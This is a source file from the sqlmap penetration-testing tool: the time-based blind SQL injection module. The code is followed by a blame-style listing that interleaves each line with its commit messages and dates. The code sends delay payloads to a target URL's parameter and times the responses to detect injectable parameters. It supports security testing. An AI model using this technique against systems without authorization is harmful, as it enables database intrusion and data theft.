sqlmap/lib/techniques/blind/timebased.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import time

from lib.core.agent import agent
from lib.core.common import calculateDeltaSeconds
from lib.core.common import getDelayQuery
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.request import inject
from lib.request.connect import Connect as Request

def timeTest():
    infoMsg  = "testing time-based blind sql injection on parameter "
    infoMsg += "'%s' with %s condition syntax" % (kb.injParameter, conf.logic)
    logger.info(infoMsg)

    timeQuery = getDelayQuery(andCond=True)
    query     = agent.prefixQuery("AND %s" % timeQuery)
    query     = agent.postfixQuery(query)
    payload   = agent.payload(newValue=query)
    start     = time.time()
    _         = Request.queryPage(payload)
    duration  = calculateDeltaSeconds(start)

    if duration >= conf.timeSec:
        infoMsg  = "the target url is affected by a time-based blind "
        infoMsg += "sql injection with AND condition syntax on parameter "
        infoMsg += "'%s'" % kb.injParameter
        logger.info(infoMsg)

        kb.timeTest = payload
    else:
        warnMsg  = "the target url is not affected by a time-based blind "
        warnMsg += "sql injection with AND condition syntax on parameter "
        warnMsg += "'%s'" % kb.injParameter
        logger.warn(warnMsg)

        infoMsg  = "testing time-based blind sql injection on parameter "
        infoMsg += "'%s' with stacked queries syntax" % kb.injParameter
        logger.info(infoMsg)

        timeQuery  = getDelayQuery(andCond=True)
        start      = time.time()
        payload, _ = inject.goStacked(timeQuery)
        duration   = calculateDeltaSeconds(start)

        if duration >= conf.timeSec:
            infoMsg  = "the target url is affected by a time-based blind sql "
            infoMsg += "injection with stacked queries syntax on parameter "
            infoMsg += "'%s'" % kb.injParameter
            logger.info(infoMsg)

            kb.timeTest = payload
        else:
            warnMsg  = "the target url is not affected by a time-based blind "
            warnMsg += "sql injection with stacked queries syntax on parameter "
            warnMsg += "'%s'" % kb.injParameter
            logger.warn(warnMsg)

            kb.timeTest = False

    return kb.timeTest

def timeUse(query):
    start      = time.time()
    _, _       = inject.goStacked(query)
    duration   = calculateDeltaSeconds(start)

    return duration
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`import time`

			`from lib.core.agent import agent`
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL) 2010-05-13 15:05:35 +04:00			`from lib.core.common import calculateDeltaSeconds`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import getDelayQuery`
			`from lib.core.data import conf`
Properly moved and improved inject.goStacked() function and newly implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file. 2008-11-13 02:44:09 +03:00			`from lib.core.data import kb`
			`from lib.core.data import logger`
			`from lib.request import inject`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`from lib.request.connect import Connect as Request`
Minor bug fix to properly execute --time-test also on MySQL >= 5.0.12 2010-01-05 14:43:16 +03:00
Properly moved and improved inject.goStacked() function and newly implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file. 2008-11-13 02:44:09 +03:00			`def timeTest():`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`infoMsg = "testing time-based blind sql injection on parameter "`
more update regarding error based injection support 2010-10-19 22:17:34 +04:00			`infoMsg += "'%s' with %s condition syntax" % (kb.injParameter, conf.logic)`
Properly moved and improved inject.goStacked() function and newly implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file. 2008-11-13 02:44:09 +03:00			`logger.info(infoMsg)`

Minor bug fix to properly execute --time-test also on MySQL >= 5.0.12 2010-01-05 14:43:16 +03:00			`timeQuery = getDelayQuery(andCond=True)`
Minor code adjustments 2010-10-25 18:11:47 +04:00			`query = agent.prefixQuery("AND %s" % timeQuery)`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`query = agent.postfixQuery(query)`
			`payload = agent.payload(newValue=query)`
			`start = time.time()`
			`_ = Request.queryPage(payload)`
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL) 2010-05-13 15:05:35 +04:00			`duration = calculateDeltaSeconds(start)`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if duration >= conf.timeSec:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`infoMsg = "the target url is affected by a time-based blind "`
			`infoMsg += "sql injection with AND condition syntax on parameter "`
			`infoMsg += "'%s'" % kb.injParameter`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`logger.info(infoMsg)`

			`kb.timeTest = payload`
Properly moved and improved inject.goStacked() function and newly implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file. 2008-11-13 02:44:09 +03:00			`else:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`warnMsg = "the target url is not affected by a time-based blind "`
			`warnMsg += "sql injection with AND condition syntax on parameter "`
			`warnMsg += "'%s'" % kb.injParameter`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`logger.warn(warnMsg)`

Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`infoMsg = "testing time-based blind sql injection on parameter "`
			`infoMsg += "'%s' with stacked queries syntax" % kb.injParameter`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`logger.info(infoMsg)`

Minor bug fix to properly execute --time-test also on MySQL >= 5.0.12 2010-01-05 14:43:16 +03:00			`timeQuery = getDelayQuery(andCond=True)`
			`start = time.time()`
			`payload, _ = inject.goStacked(timeQuery)`
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL) 2010-05-13 15:05:35 +04:00			`duration = calculateDeltaSeconds(start)`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if duration >= conf.timeSec:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`infoMsg = "the target url is affected by a time-based blind sql "`
			`infoMsg += "injection with stacked queries syntax on parameter "`
			`infoMsg += "'%s'" % kb.injParameter`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`logger.info(infoMsg)`

			`kb.timeTest = payload`
			`else:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`warnMsg = "the target url is not affected by a time-based blind "`
			`warnMsg += "sql injection with stacked queries syntax on parameter "`
			`warnMsg += "'%s'" % kb.injParameter`
Added support to test for stacked queries support and improved check for time based blind sql injection. Minor bug fix in --save option 2008-12-17 00:30:24 +03:00			`logger.warn(warnMsg)`

			`kb.timeTest = False`
Minor fixes 2008-11-13 03:03:04 +03:00
			`return kb.timeTest`
Minor bug fix to properly execute --time-test also on MySQL >= 5.0.12 2010-01-05 14:43:16 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`def timeUse(query):`
			`start = time.time()`
			`_, _ = inject.goStacked(query)`
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL) 2010-05-13 15:05:35 +04:00			`duration = calculateDeltaSeconds(start)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`return duration`